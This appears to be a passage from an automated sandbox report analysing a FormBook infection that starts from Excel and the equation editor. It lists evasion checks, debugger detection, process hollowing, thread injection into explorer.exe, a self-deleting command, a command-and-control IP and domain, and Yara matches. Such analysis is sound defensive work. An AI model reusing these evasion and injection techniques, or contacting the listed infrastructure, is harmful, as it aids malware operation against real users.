Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0042A8F4
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000002118604 second address: 000000000211860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000211899E second address: 00000000021189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe RDTSC instruction interceptor: First address: 0000000003BC8604 second address: 0000000003BC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe RDTSC instruction interceptor: First address: 0000000003BC899E second address: 0000000003BC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe RDTSC instruction interceptor: First address: 0000000003A18604 second address: 0000000003A1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe RDTSC instruction interceptor: First address: 0000000003A1899E second address: 0000000003A189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0042D734 7_2_0042D734
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0042D734 10_2_0042D734
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2812 Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2128 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Odhbljup.exe TID: 1184 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Odhbljup.exe TID: 1712 Thread sleep time: -120000s >= -30000s
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0042D734 10_2_0042D734
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\Public\vbc.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_004505B0
Source: C:\Users\user\Odhbljup.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 7_2_004505B0
Source: C:\Users\user\Odhbljup.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 10_2_004505B0
Source: explorer.exe, 00000006.00000000.544520820.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_004244DC GetSystemInfo, 4_2_004244DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 7_2_004057AC
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 10_2_004057AC

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD26F8 mov eax, dword ptr fs:[00000030h] 12_2_01FD26F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Users\user\Odhbljup.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\user\Odhbljup.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk, 12_2_01FC00C4

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 87.98.234.164 80
Source: C:\Windows\explorer.exe Domain query: www.urzeczenie.com
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 870000
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405984
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_004062CC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_0040CAF8
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B4DC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B528
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405A8F
Source: C:\Users\user\Odhbljup.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 7_2_00405984
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 7_2_004062CC
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA,GetACP, 7_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 7_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 7_2_0040B528
Source: C:\Users\user\Odhbljup.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 7_2_00405A8F
Source: C:\Users\user\Odhbljup.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_00405984
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 10_2_004062CC
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA,GetACP, 10_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 10_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe Code function: GetLocaleInfoA, 10_2_0040B528
Source: C:\Users\user\Odhbljup.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_00405A8F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409F7C GetLocalTime, 4_2_00409F7C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C GetVersion, 4_2_0043DD6C

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY